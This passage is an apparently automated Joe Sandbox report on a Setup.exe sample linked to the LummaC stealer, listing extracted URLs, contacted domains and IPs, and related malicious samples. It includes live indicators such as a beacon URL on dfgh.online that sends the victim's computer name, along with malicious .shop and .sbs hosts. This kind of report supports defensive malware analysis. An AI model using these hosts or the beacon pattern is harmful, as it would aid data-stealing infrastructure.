                                                http://repository.certum.pl/cscasha2.cer0T0VC3MU5SNNFXQB43V5.tmp, 00000014.00000003.2641722859.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000014.00000003.2634835497.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000016.00000003.3134751651.00000000025F0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drfalse
                                                  		high
                                                  http://ocsp.sectigo.com0T0VC3MU5SNNFXQB43V5.tmp, 00000014.00000003.2641722859.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000014.00000003.2634835497.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000016.00000003.3134751651.00000000025F0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drfalse
                                                    		high
                                                    http://ocsp.vikingcloud.com/0AT0VC3MU5SNNFXQB43V5.exe.13.drfalse
                                                      		high
                                                      http://certs.securetrust.com/issuers/TWGCA.crt0T0VC3MU5SNNFXQB43V5.exe.13.drfalse
                                                        		high
                                                        http://ocsp.vikingcloud.com/0:T0VC3MU5SNNFXQB43V5.exe.13.drfalse
                                                          		high
                                                          http://crl.usertrT0VC3MU5SNNFXQB43V5.tmp, 00000014.00000003.2641722859.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000016.00000003.3134751651.00000000025F0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://certs.securetrust.com/issuers/VCTWGTSCA_L1.crt0T0VC3MU5SNNFXQB43V5.exe.13.drfalse
                                                              		high
                                                              https://contoso.com/Licensepowershell.exe, 00000011.00000002.2556892585.00000000055F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://dfgh.online/invoker.php?compName=powershell.exe, 00000011.00000002.2554947823.0000000004591000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://dfgh.online/invoker.php?compName=user-PCpowershell.exe, 00000011.00000002.2554947823.00000000046E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  		unknown
                                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=M.com, 0000000D.00000003.2442381109.00000000045D0000.00000004.00000800.00020000.00000000.sdmp, M.com, 0000000D.00000003.2442531809.0000000004744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://www.autoitscript.com/autoit3/M.com, 0000000D.00000003.2420067526.0000000004C54000.00000004.00000800.00020000.00000000.sdmp, M.com.2.dr, Enable.9.drfalse
                                                                      		high
                                                                      http://crl.vikingcloud.com/TWGCA.crl0tT0VC3MU5SNNFXQB43V5.exe.13.drfalse
                                                                        		high
                                                                        https://certs.securetrust.com/CA05T0VC3MU5SNNFXQB43V5.exe.13.drfalse
                                                                          		high
                                                                          https://aka.ms/pscore6lBpowershell.exe, 00000011.00000002.2554947823.0000000004591000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.remobjects.com/psT0VC3MU5SNNFXQB43V5.exe, 00000013.00000003.2626183069.0000000002ACF000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.exe, 00000013.00000003.2629537695.000000007F89B000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000014.00000000.2632251744.0000000000191000.00000020.00000001.01000000.0000000B.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000016.00000000.2654428683.0000000000CDD000.00000020.00000001.01000000.0000000D.sdmpfalse
                                                                              		high
                                                                              http://x1.c.lencr.org/0M.com, 0000000D.00000003.2464222200.00000000045DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://x1.i.lencr.org/0M.com, 0000000D.00000003.2464222200.00000000045DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://crt.sectigo.com/SectigT0VC3MU5SNNFXQB43V5.tmp, 00000014.00000003.2641722859.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000016.00000003.3134751651.00000000025F0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchM.com, 0000000D.00000003.2442381109.00000000045D0000.00000004.00000800.00020000.00000000.sdmp, M.com, 0000000D.00000003.2442531809.0000000004744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://subca.ocsp-certum.com01T0VC3MU5SNNFXQB43V5.tmp, 00000014.00000003.2641722859.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000014.00000003.2634835497.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000016.00000003.3134751651.00000000025F0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drfalse
                                                                                        		high
                                                                                        https://contoso.com/powershell.exe, 00000011.00000002.2556892585.00000000055F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://nuget.org/nuget.exepowershell.exe, 00000011.00000002.2556892585.00000000055F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://www.innosetup.com/T0VC3MU5SNNFXQB43V5.exe, 00000013.00000003.2626183069.0000000002ACF000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.exe, 00000013.00000003.2629537695.000000007F89B000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000014.00000000.2632251744.0000000000191000.00000020.00000001.01000000.0000000B.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000016.00000000.2654428683.0000000000CDD000.00000020.00000001.01000000.0000000D.sdmpfalse
                                                                                              		high
                                                                                              https://sectigo.com/CPS0DT0VC3MU5SNNFXQB43V5.tmp, 00000014.00000003.2641722859.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000014.00000003.2634835497.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000016.00000003.3134751651.00000000025F0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drfalse
                                                                                                		high
                                                                                                http://michaeluno.jp/HBrightLib.exe, 00000031.00000002.3111928278.00000000033A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                		unknown
                                                                                                https://dfgh.onlinepowershell.exe, 00000011.00000002.2554947823.00000000046E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://jrsoftware.org0T0VC3MU5SNNFXQB43V5.tmp, 00000014.00000003.2641722859.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000014.00000003.2634835497.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000016.00000003.3134751651.00000000025F0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  https://jrsoftware.org/T0VC3MU5SNNFXQB43V5.tmp, 00000014.00000003.2641722859.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000014.00000003.2634835497.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000016.00000003.3134751651.00000000025F0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  		unknown
                                                                                                  https://certs.securetrust.com/CA0T0VC3MU5SNNFXQB43V5.exe.13.drfalse
                                                                                                    		high
                                                                                                    https://dfgh.online/invoker.php?compname=powershell.exe, 00000011.00000002.2554408777.00000000028E8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://www.autohotkey.comCouldBrightLib.exe, 00000031.00000000.3070150341.000000000049A000.00000002.00000001.01000000.0000000F.sdmp, BrightLib.exe, 00000031.00000002.3110718350.000000000049A000.00000002.00000001.01000000.0000000F.sdmp, is-STFPD.tmp.22.drfalse
                                                                                                        		high
                                                                                                        https://support.mozilla.org/products/firefoxgro.allM.com, 0000000D.00000003.2464957787.0000000005AE9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000011.00000002.2554947823.0000000004591000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://www.certum.pl/CPS0T0VC3MU5SNNFXQB43V5.tmp, 00000014.00000003.2641722859.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000014.00000003.2634835497.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000016.00000003.3134751651.00000000025F0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drfalse
                                                                                                              		high
                                                                                                              http://crl.trustwave.com/TWGCA.crl0nT0VC3MU5SNNFXQB43V5.exe.13.drfalse
                                                                                                                		high
                                                                                                                http://nuget.org/NuGet.exepowershell.exe, 00000011.00000002.2556892585.00000000055F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://sectigo.com/CPS0T0VC3MU5SNNFXQB43V5.tmp, 00000014.00000003.2641722859.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000016.00000003.3134751651.00000000025F0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://repository.certum.pl/ctnca.cer09T0VC3MU5SNNFXQB43V5.tmp, 00000014.00000003.2641722859.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000014.00000003.2634835497.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000016.00000003.3134751651.00000000025F0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drfalse
                                                                                                                      		high
                                                                                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icoM.com, 0000000D.00000003.2442381109.00000000045D0000.00000004.00000800.00020000.00000000.sdmp, M.com, 0000000D.00000003.2442531809.0000000004744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://crl.securetrust.com/TWGCSCA_L1.crl0yT0VC3MU5SNNFXQB43V5.exe.13.drfalse
                                                                                                                          		high
                                                                                                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000011.00000002.2554947823.00000000046E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://crl.certum.pl/ctnca.crl0kT0VC3MU5SNNFXQB43V5.tmp, 00000014.00000003.2641722859.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000014.00000003.2634835497.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000016.00000003.3134751651.00000000025F0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drfalse
                                                                                                                              		high
                                                                                                                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000011.00000002.2554947823.00000000046E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://go.micropowershell.exe, 00000011.00000002.2554947823.0000000004D95000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://contoso.com/Iconpowershell.exe, 00000011.00000002.2556892585.00000000055F6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=M.com, 0000000D.00000003.2442381109.00000000045D0000.00000004.00000800.00020000.00000000.sdmp, M.com, 0000000D.00000003.2442531809.0000000004744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://crl.rootca1.amazontrust.com/rootca1.crl0M.com, 0000000D.00000003.2464222200.00000000045DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://www.autoitscript.com/autoit3/XM.com, 0000000D.00000000.2072998338.0000000000A05000.00000002.00000001.01000000.00000007.sdmp, M.com, 0000000D.00000003.2420067526.0000000004C54000.00000004.00000800.00020000.00000000.sdmp, Chancellor.9.dr, M.com.2.drfalse
                                                                                                                                          		high
                                                                                                                                          http://ocsp.rootca1.amazontrust.com0:M.com, 0000000D.00000003.2464222200.00000000045DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://www.autohotkey.comBrightLib.exe, 00000031.00000000.3070150341.000000000049A000.00000002.00000001.01000000.0000000F.sdmp, BrightLib.exe, 00000031.00000002.3110718350.000000000049A000.00000002.00000001.01000000.0000000F.sdmp, is-STFPD.tmp.22.drfalse
                                                                                                                                              		high
                                                                                                                                              http://nsis.sf.net/NSIS_ErrorErrorSetup.exefalse
                                                                                                                                                		high
                                                                                                                                                https://www.certum.pl/CPS0T0VC3MU5SNNFXQB43V5.tmp, 00000014.00000003.2641722859.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000014.00000003.2634835497.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000016.00000003.3134751651.00000000025F0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drfalse
                                                                                                                                                  		high
                                                                                                                                                  https://www.ecosia.org/newtab/M.com, 0000000D.00000003.2442381109.00000000045D0000.00000004.00000800.00020000.00000000.sdmp, M.com, 0000000D.00000003.2442531809.0000000004744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brM.com, 0000000D.00000003.2464957787.0000000005AE9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      http://crl.certum.pl/cscasha2.crl0qT0VC3MU5SNNFXQB43V5.tmp, 00000016.00000003.3134751651.00000000025F0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drfalse
                                                                                                                                                        		high
                                                                                                                                                        https://github.com/Pester/Pesterpowershell.exe, 00000011.00000002.2554947823.00000000046E6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          http://cscasha2.ocsp-certum.com04T0VC3MU5SNNFXQB43V5.tmp, 00000014.00000003.2641722859.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000014.00000003.2634835497.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000016.00000003.3134751651.00000000025F0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drfalse
                                                                                                                                                            		high
                                                                                                                                                            http://certs.securetrust.com/issuers/TWGCSCA_L1.crt0T0VC3MU5SNNFXQB43V5.exe.13.drfalse
                                                                                                                                                              		high
                                                                                                                                                              https://ac.ecosia.org/autocomplete?q=M.com, 0000000D.00000003.2442381109.00000000045D0000.00000004.00000800.00020000.00000000.sdmp, M.com, 0000000D.00000003.2442531809.0000000004744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tT0VC3MU5SNNFXQB43V5.tmp, 00000014.00000003.2641722859.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000014.00000003.2634835497.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000016.00000003.3134751651.00000000025F0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#T0VC3MU5SNNFXQB43V5.tmp, 00000014.00000003.2641722859.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000014.00000003.2634835497.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000016.00000003.3134751651.00000000025F0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drfalse
                                                                                                                                                                    		high
                                                                                                                                                                    http://crl.vikingcloud.com/VCTWGTSCA_L1.crl0T0VC3MU5SNNFXQB43V5.exe.13.drfalse
                                                                                                                                                                      		high
                                                                                                                                                                      http://crt.rootca1.amazontrust.com/rootca1.cer0?M.com, 0000000D.00000003.2464222200.00000000045DD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://www.info-zip.org/BrightLib.exe, 00000031.00000002.3132032526.0000000039D0B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://michaeluno.jp/BrightLib.exe, 00000031.00000000.3070273332.0000000000AEE000.00000002.00000001.01000000.0000000F.sdmp, BrightLib.exe, 00000031.00000002.3111411093.0000000001050000.00000004.00000020.00020000.00000000.sdmp, BrightLib.exe, 00000031.00000002.3111928278.0000000003370000.00000004.00000020.00020000.00000000.sdmp, BrightLib.exe, 00000031.00000002.3112485410.00000000063F8000.00000004.00000020.00020000.00000000.sdmp, is-STFPD.tmp.22.drfalse
                                                                                                                                                                            		high
                                                                                                                                                                            http://ocsp.securetrust.com/0?T0VC3MU5SNNFXQB43V5.exe.13.drfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=M.com, 0000000D.00000003.2442381109.00000000045D0000.00000004.00000800.00020000.00000000.sdmp, M.com, 0000000D.00000003.2442531809.0000000004744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high

                                                                                                                                                                                World Map of Contacted IPs

                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                                                Public IPs

                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                104.21.44.159
                                                                                                                                                                                		yokesandusj.sbsUnited States
                                                                                                                                                                                		13335CLOUDFLARENETUStrue
                                                                                                                                                                                185.161.251.21
                                                                                                                                                                                		cegu.shopUnited Kingdom
                                                                                                                                                                                		5089NTLGBfalse
                                                                                                                                                                                172.67.208.58
                                                                                                                                                                                		klipvumisui.shopUnited States
                                                                                                                                                                                		13335CLOUDFLARENETUSfalse

                                                                                                                                                                                General Information

                                                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                Analysis ID:1584737
                                                                                                                                                                                Start date and time:2025-01-06 12:15:11 +01:00
                                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                                Overall analysis duration:0h 8m 54s
                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                Report type:full
                                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                Number of analysed new started processes analysed:50
                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                                Technologies:
                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                Sample name:Setup.exe
                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                Classification:mal100.troj.spyw.evad.winEXE@84/35@5/3
                                                                                                                                                                                EGA Information:
                                                                                                                                                                                • Successful, ratio: 33.3%
                                                                                                                                                                                HCA Information:
                                                                                                                                                                                • Successful, ratio: 51%
                                                                                                                                                                                • Number of executed functions: 48
                                                                                                                                                                                • Number of non-executed functions: 41
                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                • Found application associated with file extension: .exe

                                                                                                                                                                                Warnings

                                                                                                                                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.95.31.18, 52.165.164.15, 13.107.246.45
                                                                                                                                                                                • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                • Execution Graph export aborted for target BrightLib.exe, PID 5428 because there are no executed function
                                                                                                                                                                                • Execution Graph export aborted for target powershell.exe, PID 1220 because it is empty
                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                Simulations

                                                                                                                                                                                Behavior and APIs

                                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                                06:16:03API Interceptor1x Sleep call for process: Setup.exe modified
                                                                                                                                                                                06:16:06API Interceptor11x Sleep call for process: M.com modified
                                                                                                                                                                                06:16:54API Interceptor5x Sleep call for process: powershell.exe modified
                                                                                                                                                                                06:17:46API Interceptor1x Sleep call for process: BrightLib.exe modified

                                                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                                                IPs

                                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                104.21.44.159https://brelif.net/acd/ab4/tac.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  185.161.251.21installer_1.05_36.7.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                      Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                        setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                          'Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                            Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                              SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                  Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                    172.67.208.58installer_1.05_36.7.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                      Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                        Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                          Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                            setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                              installer_1.05_36.5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                MdhO83N5Fm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  @Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    does virginia have a no chase law for motorcycles 62848.jsGet hashmaliciousUnknownBrowse

                                                                                                                                                                                                                      Domains

                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                      cegu.shopinstaller_1.05_36.7.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                      • 185.161.251.21
                                                                                                                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 185.161.251.21
                                                                                                                                                                                                                      Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 185.161.251.21
                                                                                                                                                                                                                      setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 185.161.251.21
                                                                                                                                                                                                                      'Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 185.161.251.21
                                                                                                                                                                                                                      Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 185.161.251.21
                                                                                                                                                                                                                      SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 185.161.251.21
                                                                                                                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 185.161.251.21
                                                                                                                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 185.161.251.21
                                                                                                                                                                                                                      default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comInsomia.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 84.201.210.35
                                                                                                                                                                                                                      T1#U5b89#U88c5#U53052.0.6.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 84.201.210.34
                                                                                                                                                                                                                      dGhlYXB0Z3JvdXA=-free.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 84.201.210.22
                                                                                                                                                                                                                      Dd5DwDCHJD.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                                      • 217.20.57.35
                                                                                                                                                                                                                      46VHQmFDxC.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                                                                      • 217.20.57.43
                                                                                                                                                                                                                      Payment-Order #24560274 for 8,380 USD.exeGet hashmaliciousAsyncRAT, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                                      • 217.20.57.35
                                                                                                                                                                                                                      PersonnelPolicies.pdfGet hashmaliciousKnowBe4, PDFPhishBrowse
                                                                                                                                                                                                                      • 217.20.57.37
                                                                                                                                                                                                                      EiO4tqZ3o4.exeGet hashmaliciousAsyncRATBrowse
                                                                                                                                                                                                                      • 217.20.58.100
                                                                                                                                                                                                                      wce.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 217.20.58.98
                                                                                                                                                                                                                      nXNMsYXFFc.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                      • 217.20.58.100
                                                                                                                                                                                                                      klipvumisui.shopinstaller_1.05_36.7.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                      • 172.67.208.58
                                                                                                                                                                                                                      Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 172.67.208.58
                                                                                                                                                                                                                      'Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 104.21.37.128
                                                                                                                                                                                                                      Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 172.67.208.58
                                                                                                                                                                                                                      SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 104.21.37.128
                                                                                                                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 172.67.208.58
                                                                                                                                                                                                                      Full_Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 104.21.37.128
                                                                                                                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 104.21.37.128
                                                                                                                                                                                                                      Active_Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                      • 104.21.37.128
                                                                                                                                                                                                                      re5.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 104.21.37.128

                                                                                                                                                                                                                      ASNs

                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                      NTLGBinstaller_1.05_36.7.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                      • 185.161.251.21
                                                                                                                                                                                                                      Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 185.161.251.21
                                                                                                                                                                                                                      Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 185.161.251.21
                                                                                                                                                                                                                      setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 185.161.251.21
                                                                                                                                                                                                                      'Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 185.161.251.21
                                                                                                                                                                                                                      Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      • 185.161.251.21
